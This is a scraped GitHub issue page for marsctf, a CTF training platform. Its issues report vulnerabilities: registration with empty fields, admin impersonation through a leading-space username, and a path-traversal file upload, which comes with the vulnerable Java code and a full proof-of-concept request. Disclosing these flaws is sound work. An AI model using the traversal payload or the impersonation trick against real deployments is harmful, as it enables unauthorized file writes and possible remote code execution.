b1ackc4t / marsctf Goto Github PK
View Code? Open in Web Editor NEWVue+Springboot开发的CTF学习平台,提供动态靶机、学习模块、writeup模块等等CTF平台的核心功能。提供docker版本
License: GNU General Public License v3.0
Vue+Springboot开发的CTF学习平台,提供动态靶机、学习模块、writeup模块等等CTF平台的核心功能。提供docker版本
License: GNU General Public License v3.0
注册界面,用户名密码什么都不填,直接点注册,可以注册成功
自己出题遇到了一些问题,因为调试不好推送到docker hub,遂按照docker官方教程搭建了一个本地registry,但是在MarsCTF的后台配置中更改docker Registry地址无效,题目显示找不到镜像,
我仔细想了一下,发现这个功能其实并不需要自己搭建registry,只需要在拉取镜像时优先使用本地镜像即可,
具体来说就是,拉取镜像前先检测一下本地镜像,如果存在则优先使用本地镜像,因为本人java水平不够,所以希望得到大佬的帮助,谢谢
首先得到管理员账号,例如管理员账号是admin
然后注册一个账号,给admin前加个空格,就是 admin
然后注册成功后就能进入后台,随意修改东西,虽然角色是ROLE_user,但实际能修改任何东西!
缺少数据库sq文件,本地无法运行l
{flag: false, msg: "服务器故障 请稍后再试"}
flag: false
msg: "服务器故障 请稍后再试"
[root@localhost marsctf-docker]# docker-compose restart
[+] Running 3/3
⠿ Container marsctf-docker-db-1 St... 4.7s
⠿ Container marsctf-docker-main-1 Started 0.9s
⠿ Container marsctf-docker-nginx-1 Started 0.9s
这个是docker启动的容器
请问是什么问题,我觉得是后端服务没起来,但是我对java不熟,不知道怎么处理,谢谢
能否新增组队功能
MarsCTF found in its V1.2.1 version that there is an arbitrary file upload vulnerability in the interface for uploading attachments in the background. Attackers can construct filenames like ../../file
to upload arbitrary files to arbitrary directories.
public ReturnRes upload(MultipartFile file) {
if (file.isEmpty()) {
return new ReturnRes(false, "上传失败,请选择文件");
}
String fileName = file.getOriginalFilename();
String snowId = String.valueOf(SnowFlakeUtil.generatorUid());
File pathFile = new File(uploadPath, snowId); // 为每个文件单独创建一个文件夹 文件夹名采用雪花算法
String path = pathFile.toString();
if (!pathFile.mkdir()) {
return new ReturnRes(false, "上传失败,服务器错误");
}
File dest = new File(path, fileName);
try {
file.transferTo(dest); // 上传成功
CTFFile ctfFile = new CTFFile(new File(snowId, fileName).toString());
int lastIndexOf = fileName.lastIndexOf(".");
String ext = lastIndexOf != -1 ? fileName.substring(lastIndexOf + 1) : "";
ctfFile.setFname(dest.getName());
ctfFile.setSize(dest.length()); // 单位字节
ctfFile.setExt(ext);
this.save(ctfFile);
return new ReturnRes(true, ctfFile.getFid());
} catch (IOException e) {
e.printStackTrace();
}
return new ReturnRes(false, "上传失败,服务器错误");
}
POST /api/admin/uploadCTFFile HTTP/1.1
Host: 127.0.0.1:7991
Content-Length: 212
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJMT0dJTl9LRVkiOiJkMTY4OGM5MC02OTE5LTQyMWQtYmNlNi0wNzBlNjJjZDFmMjYifQ.ATcpBgxvayuZGVlUgNCKS9daRzYHZvEhovz6yz607OA
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBqYTzzXHADWlZYul
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://127.0.0.1:7991
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:7991/admin/challenge/add
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Mars-Token=eyJhbGciOiJIUzI1NiJ9.eyJMT0dJTl9LRVkiOiJkMTY4OGM5MC02OTE5LTQyMWQtYmNlNi0wNzBlNjJjZDFmMjYifQ.ATcpBgxvayuZGVlUgNCKS9daRzYHZvEhovz6yz607OA
Connection: close
------WebKitFormBoundaryBqYTzzXHADWlZYul
Content-Disposition: form-data; name="file"; filename="../../hackFile"
Content-Type: application/octet-stream
hackFile
------WebKitFormBoundaryBqYTzzXHADWlZYul--
Attackers can exploit this vulnerability to upload dynamic link libraries or write scheduled tasks to implement RCE.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.